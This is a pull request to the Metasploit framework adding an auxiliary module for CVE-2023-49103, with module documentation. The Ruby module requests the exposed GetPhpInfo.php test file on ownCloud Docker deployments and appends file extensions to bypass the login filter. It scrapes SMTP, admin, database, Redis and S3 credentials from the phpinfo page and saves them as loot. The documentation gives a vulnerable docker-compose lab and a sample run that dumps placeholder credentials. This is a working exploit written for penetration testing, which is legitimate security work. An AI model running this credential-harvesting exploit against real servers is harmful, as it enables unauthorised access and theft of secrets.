### PR TITLE
ownCloud phpinfo reader (CVE-2023-49103)

### DIFF
--- a/documentation/modules/auxiliary/gather/owncloud_phpinfo_reader.md
+++ b/documentation/modules/auxiliary/gather/owncloud_phpinfo_reader.md
@@ -1,5 +1,9 @@
 ## Vulnerable Application
 
+Docker containers of ownCloud compiled after February 2023, which have version 0.2.0 before 0.2.1 or 0.3.0 before 0.3.1 of the app `graph` installed
+contain a test file which prints `phpinfo()` to an unauthenticated user. A post file name must be appended to the URL to bypass the login filter.
+Docker may export sensitive environment variables including ownCloud, DB, redis, SMTP, and S3 credentials, as well as other host information.
+
 ### Docker-Compose Build
 
 Using docker-compose we can build a fairly robust system with plenty of information to pilfer.
@@ -78,37 +82,81 @@ services:
 
 You may need to add an aditional entry to `OWNCLOUD_TRUSTED_DOMAINS` which has the IP address of the host, such as `OWNCLOUD_TRUSTED_DOMAINS=localhost,192.68.1.1`
 
-## Verification Steps
-Example steps in this format (is also in the PR):
+If the `graph` app needs to be installed, use the following instructions:
 
-1. Install the application
+```
+docker exec -it owncloud /bin/bash
+cd apps
+wget "$(curl 'https://marketplace.owncloud.com/ajax/apps/graphapi/0.3.0' | sed 's/\\//g' | cut -d '"' -f 4)" -O graphapi-0.3.0.tar.gz
+rm -rf graphapi
+tar -zxf graphapi-0.3.0.tar.gz
+occ app:enable graphapi
+```
+
+## Verification Steps
+
+1. Install the application and plugin
 1. Start msfconsole
-1. Do: `use [module path]`
+1. Do: `use auxiliary/gather/owncloud_phpinfo_reader`
+1. Do: `set rhost [ip]`
 1. Do: `run`
-1. You should get a shell.
+1. You should information from the system configuration
 
 ## Options
-List each option and how to use it.
 
-### Option Name
+### ROOT
 
-Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+Root path of the URI, which is different than `TARGETURI` as its ownCloud specific. Defaults to `all` which will try `''` (empty), and `owncloud`
+
+### ENDFILE
+
+The file path to add to the end of hte URL, which is used to bypass filtering. Defaults to `all` which will try `/.css`, `/.js`, `/.svg`,
+`/.gif`, `/.png`, `/.html`, `/.ttf`, `/.woff`, `/.ico`, `/.jpg`, `/.jpeg`, `/.json`, `/.properties`, `/.min.map`, `/.js.map`, `/.auto.map`
 
 ## Scenarios
-Specific demo of using the module that might be useful in a real world scenario.
 
-### Version and OS
-
-```
-code or console output
-```
-
-For example:
-
-To do this specific thing, here's how you do it:
+### ownCloud 10.12.1 from Docker Compose
 
 ```
-msf > use module_name
-msf auxiliary(module_name) > set POWERLEVEL >9000
-msf auxiliary(module_name) > exploit
+resource (owncloud.rb)> use auxiliary/gather/owncloud_phpinfo_reader
+resource (owncloud.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (owncloud.rb)> set verbose true
+verbose => true
+resource (owncloud.rb)> run
+[*] Running module against 127.0.0.1
+[*] Checking: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
+[+] Found phpinfo page at: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
+[+] Loot stored to: /home/h00die/.msf4/loot/20231203153109_default_127.0.0.1_owncloud.phpinfo_453632.txt
+[+] License Key: 1122333
+[+] Hostname: b2b16d6f3ba6
+[+] Home: /root
+[+] Server Root: /var/www/owncloud
+[+] PWD: /var/www/owncloud
+[+] SMTP Username: smtp_username
+[+] SMTP Password: smtp_password
+[+] ownCloud Username: admin_username
+[+] ownCloud Password: admin_password
+[+] DB Host: mariadb:3306
+[+] DB Username: owncloud
+[+] DB Password: owncloud
+[+] DB Name: owncloud
+[+] Redis Host: redis
+[+] Redis Port: 6379
+[+] Objectstore Endpoint: https://s3.us-east-1.amazonaws.com
+[+] Objectstore Region: us-east-1
+[+] Objectsore Secret: secret123456
+[+] Objectstore Key: owncloud123456
+[+] Objectstore Bucket: owncloud
+[+] Credentials
+===========
+
+  Type             Host            Username             Password              Notes
+  ----             ----            --------             --------              -----
+  S3 Object Store  us-east-1       Key: owncloud123456  Secret: secret123456  Endpoint: https://s3.us-east-1.amazonaws.com, Bucket: owncloud
+  SMTP             127.0.0.1:25    smtp_username        smtp_password
+  mysql            127.0.0.1:8080  owncloud             owncloud
+  ownCloud         127.0.0.1:8080  admin_username       admin_password
+
+[*] Auxiliary module execution completed
 ```

--- a/documentation/modules/auxiliary/gather/owncloud_phpinfo_reader.md
+++ b/documentation/modules/auxiliary/gather/owncloud_phpinfo_reader.md
@@ -85,7 +85,7 @@ You may need to add an aditional entry to `OWNCLOUD_TRUSTED_DOMAINS` which has t
 If the `graph` app needs to be installed, use the following instructions:
 
 ```
-docker exec -it owncloud /bin/bash
+docker exec -it owncloud_server /bin/bash
 cd apps
 wget "$(curl 'https://marketplace.owncloud.com/ajax/apps/graphapi/0.3.0' | sed 's/\\//g' | cut -d '"' -f 4)" -O graphapi-0.3.0.tar.gz
 rm -rf graphapi

--- a/documentation/modules/auxiliary/gather/owncloud_phpinfo_reader.md
+++ b/documentation/modules/auxiliary/gather/owncloud_phpinfo_reader.md
@@ -1,0 +1,114 @@
+## Vulnerable Application
+
+### Docker-Compose Build
+
+Using docker-compose we can build a fairly robust system with plenty of information to pilfer.
+
+Based off of [Ron Bowes Blog Post](https://www.labs.greynoise.io//grimoire/2023-11-29-owncloud-redux/)
+
+A list of environment variables is posted [here](https://github.com/owncloud-docker/base/blob/master/ENVIRONMENT.md#environment-variables)
+
+```
+version: "3"
+
+services:
+  owncloud:
+    image: owncloud/server:10.12.1
+    container_name: owncloud_server
+    restart: always
+    ports:
+      - 8080:8080
+    depends_on:
+      - mariadb
+      - redis
+    environment:
+      - OWNCLOUD_DOMAIN=localhost:8080
+      - OWNCLOUD_TRUSTED_DOMAINS=localhost
+      - OWNCLOUD_DB_TYPE=mysql
+      - OWNCLOUD_DB_NAME=owncloud
+      - OWNCLOUD_DB_USERNAME=owncloud
+      - OWNCLOUD_DB_PASSWORD=owncloud
+      - OWNCLOUD_DB_HOST=mariadb
+      - OWNCLOUD_ADMIN_USERNAME=admin_username
+      - OWNCLOUD_ADMIN_PASSWORD=admin_password
+      - OWNCLOUD_MYSQL_UTF8MB4=true
+      - OWNCLOUD_REDIS_ENABLED=true
+      - OWNCLOUD_REDIS_HOST=redis
+      - APACHE_LOG_LEVEL=trace6
+      - OWNCLOUD_MAIL_SMTP_PASSWORD=smtp_password
+      - OWNCLOUD_MAIL_SMTP_NAME=smtp_username
+      - OWNCLOUD_LICENSE_KEY=1122333
+      - OWNCLOUD_OBJECTSTORE_KEY=owncloud123456
+      - OWNCLOUD_OBJECTSTORE_SECRET=secret123456
+      - OWNCLOUD_OBJECTSTORE_REGION=us-east-1
+    healthcheck:
+      test: ["CMD", "/usr/bin/healthcheck"]
+      interval: 30s
+      timeout: 10s
+      retries: 5
+
+  mariadb:
+    image: mariadb:10.11 # minimum required ownCloud version is 10.9
+    container_name: owncloud_mariadb
+    restart: always
+    environment:
+      - MYSQL_ROOT_PASSWORD=owncloud
+      - MYSQL_USER=owncloud
+      - MYSQL_PASSWORD=owncloud
+      - MYSQL_DATABASE=owncloud
+      - MARIADB_AUTO_UPGRADE=1
+    command: ["--max-allowed-packet=128M", "--innodb-log-file-size=64M"]
+    healthcheck:
+      test: ["CMD", "mysqladmin", "ping", "-u", "root", "--password=owncloud"]
+      interval: 10s
+      timeout: 5s
+      retries: 5
+
+  redis:
+    image: redis:6
+    container_name: owncloud_redis
+    restart: always
+    command: ["--databases", "1"]
+    healthcheck:
+      test: ["CMD", "redis-cli", "ping"]
+      interval: 10s
+      timeout: 5s
+      retries: 5
+```
+
+You may need to add an aditional entry to `OWNCLOUD_TRUSTED_DOMAINS` which has the IP address of the host, such as `OWNCLOUD_TRUSTED_DOMAINS=localhost,192.68.1.1`
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+List each option and how to use it.
+
+### Option Name
+
+Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### Version and OS
+
+```
+code or console output
+```
+
+For example:
+
+To do this specific thing, here's how you do it:
+
+```
+msf > use module_name
+msf auxiliary(module_name) > set POWERLEVEL >9000
+msf auxiliary(module_name) > exploit
+```

--- a/modules/auxiliary/gather/owncloud_phpinfo_reader.rb
+++ b/modules/auxiliary/gather/owncloud_phpinfo_reader.rb
@@ -38,8 +38,8 @@ class MetasploitModule < Msf::Auxiliary
         'DisclosureDate' => '2023-11-21',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [IOC_IN_LOGS],
-          'SideEffects' => []
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
         }
       )
     )

--- a/modules/auxiliary/gather/owncloud_phpinfo_reader.rb
+++ b/modules/auxiliary/gather/owncloud_phpinfo_reader.rb
@@ -1,0 +1,181 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ownCloud Phpinfo Reader',
+        'Description' => %q{
+          This exploit module illustrates how a vulnerability could be exploited
+          in a webapp.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'creacitysec', # original PoC
+          'Ron Bowes', # research
+          'random-robbie' # additional PoC work and research
+        ],
+        'References' => [
+          [ 'URL', 'https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/'],
+          [ 'URL', 'https://github.com/creacitysec/CVE-2023-49103'],
+          [ 'URL', 'https://www.labs.greynoise.io//grimoire/2023-11-29-owncloud-redux/'],
+          [ 'URL', 'https://www.rapid7.com/blog/post/2023/12/01/etr-cve-2023-49103-critical-information-disclosure-in-owncloud-graph-api/'],
+          [ 'CVE', '2023-49103']
+        ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2023-11-21'
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The URI of ownCloud', '/']),
+        OptEnum.new('ROOT', [true, 'Root path to start with', 'all', ['all', '', 'owncloud'] ]),
+        OptEnum.new('ENDFILE', [
+          true, 'End path to append', 'all', [
+            'all', 'css', 'js', 'svg', 'gif', 'png', 'html', 'ttf', 'woff', 'ico', 'jpg',
+            'jpeg', 'json', 'properties', 'min.map', 'js.map', 'auto.map'
+          ]
+        ]),
+      ]
+    )
+  end
+
+  def roots
+    if datastore['ROOT'] == 'all'
+      return ['', 'owncloud']
+    end
+
+    datastore['ROOT']
+  end
+
+  def endfiles
+    if datastore['ENDFILE'] == 'all'
+      return [
+        '.css', '.js', '.svg', '.gif', '.png', '.html', '.ttf', '.woff', '.ico', '.jpg',
+        '.jpeg', '.json', '.properties', '.min.map', '.js.map', '.auto.map'
+      ]
+    end
+    ".#{datastore['ENDFILE']}"
+  end
+
+  def field_regex(field)
+    "<tr><td class=\"e\">#{field} <\/td><td class=\"v\">([^ ]+) <\/td><\/tr>"
+  end
+
+  def run
+    roots.each do |root|
+      endfiles.each do |endfile|
+        url = normalize_uri(target_uri.path, root, 'apps', 'graphapi', 'vendor', 'microsoft', 'microsoft-graph', 'tests', 'GetPhpInfo.php', endfile)
+        vprint_status("Checking: #{url}")
+        res = send_request_cgi(
+          'uri' => url
+        )
+
+        fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+        unless res.code == 200 && res.body.include?('phpinfo()')
+          print_bad("Not Exploited - HTTP Status Code: #{res.code}")
+          next
+        end
+        print_good("Found phpinfo page at: #{url}")
+
+        # store page
+        l = store_loot(
+          'owncloud.phpinfo',
+          'text/html',
+          rhost,
+          res.body,
+          'phpinfo.html'
+        )
+        print_good("Loot stored to: #{l}")
+
+        # process the page
+
+        ## License Key
+        print_good("License Key: #{::Regexp.last_match(1)}") if res.body =~ /#{field_regex('OWNCLOUD_LICENSE_KEY')}/
+
+        ## SMTP
+        if res.body =~ /#{field_regex('OWNCLOUD_MAIL_SMTP_HOST')}/
+          smtp_host = ::Regexp.last_match(1)
+          print_good("SMTP Host: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_MAIL_SMTP_PORT')}/
+          smtp_port = ::Regexp.last_match(1)
+          print_good("SMTP Port: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_MAIL_SMTP_NAME')}/
+          smtp_username = ::Regexp.last_match(1)
+          print_good("SMTP Username: #{::Regexp.last_match(1)}")
+        end
+
+        if res.body =~ /#{field_regex('OWNCLOUD_MAIL_SMTP_PASSWORD')}/
+          smtp_password = ::Regexp.last_match(1)
+          print_good("SMTP Password: #{::Regexp.last_match(1)}")
+        end
+
+        if smtp_password
+          credential_data = {
+            protocol: 'tcp',
+            workspace_id: myworkspace_id,
+            service_name: 'SMTP',
+            origin_type: :service,
+            module_fullname: fullname,
+            status: Metasploit::Model::Login::Status::UNTRIED,
+            private_data: smtp_password,
+            private_type: :password
+          }
+          credential_data[:username] = smtp_username if smtp_username
+          credential_data[:address] = smtp_host.nil? ? '127.0.0.1' : smtp_host
+          credential_data[:port] = smtp_port.nil? ? 25 : smtp_port
+
+          create_credential(credential_data)
+        end
+
+        ## ownCloud
+        if res.body =~ /#{field_regex('OWNCLOUD_ADMIN_USERNAME')}/
+          owncloud_username = ::Regexp.last_match(1)
+          print_good("ownCloud Username: #{::Regexp.last_match(1)}")
+        end
+
+        if res.body =~ /#{field_regex('OWNCLOUD_ADMIN_PASSWORD')}/
+          owncloud_password = ::Regexp.last_match(1)
+          print_good("ownCloud Password: #{::Regexp.last_match(1)}")
+        end
+
+        if res.body =~ /#{field_regex('SERVER_PORT')}/
+          ::Regexp.last_match(1)
+        end
+
+        if owncloud_password
+          credential_data = {
+            protocol: 'tcp',
+            port: rport,
+            address: rhost,
+            workspace_id: myworkspace_id,
+            service_name: 'ownCloud',
+            origin_type: :service,
+            module_fullname: fullname,
+            status: Metasploit::Model::Login::Status::UNTRIED,
+            private_data: owncloud_password,
+            private_type: :password
+          }
+          credential_data[:username] = owncloud_username if owncloud_username
+
+          create_credential(credential_data)
+        end
+
+        return # no need to keep going, we already got what we wanted
+      end
+    end
+  end
+end

--- a/modules/auxiliary/gather/owncloud_phpinfo_reader.rb
+++ b/modules/auxiliary/gather/owncloud_phpinfo_reader.rb
@@ -13,15 +13,17 @@ class MetasploitModule < Msf::Auxiliary
         info,
         'Name' => 'ownCloud Phpinfo Reader',
         'Description' => %q{
-          This exploit module illustrates how a vulnerability could be exploited
-          in a webapp.
+          Docker containers of ownCloud compiled after February 2023, which have version 0.2.0 before 0.2.1 or 0.3.0 before 0.3.1 of the app `graph` installed
+          contain a test file which prints `phpinfo()` to an unauthenticated user. A post file name must be appended to the URL to bypass the login filter.
+          Docker may export sensitive environment variables including ownCloud, DB, redis, SMTP, and S3 credentials, as well as other host information.
         },
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die', # msf module
           'creacitysec', # original PoC
           'Ron Bowes', # research
-          'random-robbie' # additional PoC work and research
+          'random-robbie', # additional PoC work and research
+          'Christian Fischer' # additional PoC work and research
         ],
         'References' => [
           [ 'URL', 'https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/'],
@@ -33,7 +35,12 @@ class MetasploitModule < Msf::Auxiliary
         'Targets' => [
           [ 'Automatic Target', {}]
         ],
-        'DisclosureDate' => '2023-11-21'
+        'DisclosureDate' => '2023-11-21',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [IOC_IN_LOGS],
+          'SideEffects' => []
+        }
       )
     )
     register_options(
@@ -74,7 +81,10 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
+    found = false
     roots.each do |root|
+      break if found
+
       endfiles.each do |endfile|
         url = normalize_uri(target_uri.path, root, 'apps', 'graphapi', 'vendor', 'microsoft', 'microsoft-graph', 'tests', 'GetPhpInfo.php', endfile)
         vprint_status("Checking: #{url}")
@@ -103,6 +113,27 @@ class MetasploitModule < Msf::Auxiliary
 
         ## License Key
         print_good("License Key: #{::Regexp.last_match(1)}") if res.body =~ /#{field_regex('OWNCLOUD_LICENSE_KEY')}/
+
+        ## Misc host things
+        if res.body =~ /#{field_regex('HOSTNAME')}/
+          print_good("Hostname: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('HOME')}/
+          print_good("Home: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('APACHE_DOCUMENT_ROOT')}/
+          print_good("Server Root: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('PWD')}/
+          print_good("PWD: #{::Regexp.last_match(1)}")
+        end
+
+        table = Rex::Text::Table.new(
+          'Header' => 'Credentials',
+          'Indent' => 2,
+          'SortIndex' => 0,
+          'Columns' => [ 'Type', 'Host', 'Username', 'Password', 'Notes']
+        )
 
         ## SMTP
         if res.body =~ /#{field_regex('OWNCLOUD_MAIL_SMTP_HOST')}/
@@ -139,6 +170,7 @@ class MetasploitModule < Msf::Auxiliary
           credential_data[:port] = smtp_port.nil? ? 25 : smtp_port
 
           create_credential(credential_data)
+          table << ['SMTP', "#{credential_data[:address]}:#{credential_data[:port]}", credential_data[:username], smtp_password, '']
         end
 
         ## ownCloud
@@ -169,12 +201,114 @@ class MetasploitModule < Msf::Auxiliary
             private_data: owncloud_password,
             private_type: :password
           }
-          credential_data[:username] = owncloud_username if owncloud_username
+          credential_data[:username] = owncloud_username.nil? ? '' : owncloud_username
 
           create_credential(credential_data)
+          table << ['ownCloud', "#{rhost}:#{rport}", credential_data[:username], owncloud_password, '']
         end
 
-        return # no need to keep going, we already got what we wanted
+        ## DB
+        if res.body =~ /#{field_regex('OWNCLOUD_DB_HOST')}/ # includes port
+          db_host = ::Regexp.last_match(1)
+          print_good("DB Host: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_DB_USERNAME')}/
+          db_username = ::Regexp.last_match(1)
+          print_good("DB Username: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_DB_PASSWORD')}/
+          db_password = ::Regexp.last_match(1)
+          print_good("DB Password: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_DB_NAME')}/
+          print_good("DB Name: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_DB_TYPE')}/
+          db_type = ::Regexp.last_match(1)
+        end
+
+        if db_password
+          credential_data = {
+            protocol: 'tcp',
+            port: db_host.split(':')[1],
+            address: db_host.split(':')[0],
+            workspace_id: myworkspace_id,
+            service_name: db_type,
+            origin_type: :service,
+            module_fullname: fullname,
+            status: Metasploit::Model::Login::Status::UNTRIED,
+            private_data: db_password,
+            private_type: :password
+          }
+          credential_data[:username] = db_username.nil? ? '' : db_username
+          create_credential(credential_data)
+          table << [db_type, "#{rhost}:#{rport}", credential_data[:username], db_password, '']
+        end
+
+        ## REDIS
+        if res.body =~ /#{field_regex('OWNCLOUD_REDIS_HOST')}/
+          redis_host = ::Regexp.last_match(1)
+          print_good("Redis Host: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_REDIS_PORT')}/
+          redis_port = ::Regexp.last_match(1)
+          print_good("Redis Port: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_REDIS_DB')}/
+          ::Regexp.last_match(1)
+          print_good("Redis DB: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_REDIS_PASSWORD')}/
+          redis_password = ::Regexp.last_match(1)
+          print_good("Redis Password: #{::Regexp.last_match(1)}")
+        end
+
+        if redis_password
+          credential_data = {
+            protocol: 'tcp',
+            port: redis_port,
+            address: redis_host,
+            workspace_id: myworkspace_id,
+            service_name: 'redis',
+            origin_type: :service,
+            module_fullname: fullname,
+            status: Metasploit::Model::Login::Status::UNTRIED,
+            private_data: redis_password,
+            private_type: :password
+          }
+
+          create_credential(credential_data)
+          table << ['redis', "#{redis_host}:#{redis_port}", '', redis_password, '']
+        end
+
+        ## OBJECTSTORE
+        if res.body =~ /#{field_regex('OWNCLOUD_OBJECTSTORE_ENDPOINT')}/
+          os_endpoint = ::Regexp.last_match(1)
+          print_good("Objectstore Endpoint: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_OBJECTSTORE_REGION')}/
+          os_region = ::Regexp.last_match(1)
+          print_good("Objectstore Region: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_OBJECTSTORE_SECRET')}/
+          os_secret = ::Regexp.last_match(1)
+          print_good("Objectsore Secret: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_OBJECTSTORE_KEY')}/
+          os_key = ::Regexp.last_match(1)
+          print_good("Objectstore Key: #{::Regexp.last_match(1)}")
+        end
+        if res.body =~ /#{field_regex('OWNCLOUD_OBJECTSTORE_BUCKET')}/
+          os_bucket = ::Regexp.last_match(1)
+          print_good("Objectstore Bucket: #{::Regexp.last_match(1)}")
+        end
+        if os_secret && os_key
+          table << ['S3 Object Store', os_region, "Key: #{os_key}", "Secret: #{os_secret}", "Endpoint: #{os_endpoint}, Bucket: #{os_bucket}"]
+        end
+
+        print_good(table.to_s)
+        found = true
+        break # no need to keep going, we already got what we wanted
       end
     end
   end


### PR DESCRIPTION
Docker containers of ownCloud compiled after February 2023, which have version 0.2.0 before 0.2.1 or 0.3.0 before 0.3.1 of the app `graph` installed
contain a test file which prints `phpinfo()` to an unauthenticated user. A post file name must be appended to the URL to bypass the login filter.
Docker may export sensitive environment variables including ownCloud, DB, redis, SMTP, and S3 credentials, as well as other host information.

- [ ] Install the application and plugin
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/gather/owncloud_phpinfo_reader`
- [ ] Do: `set rhost [ip]`
- [ ] Do: `run`
- [ ] You should information from the system configuration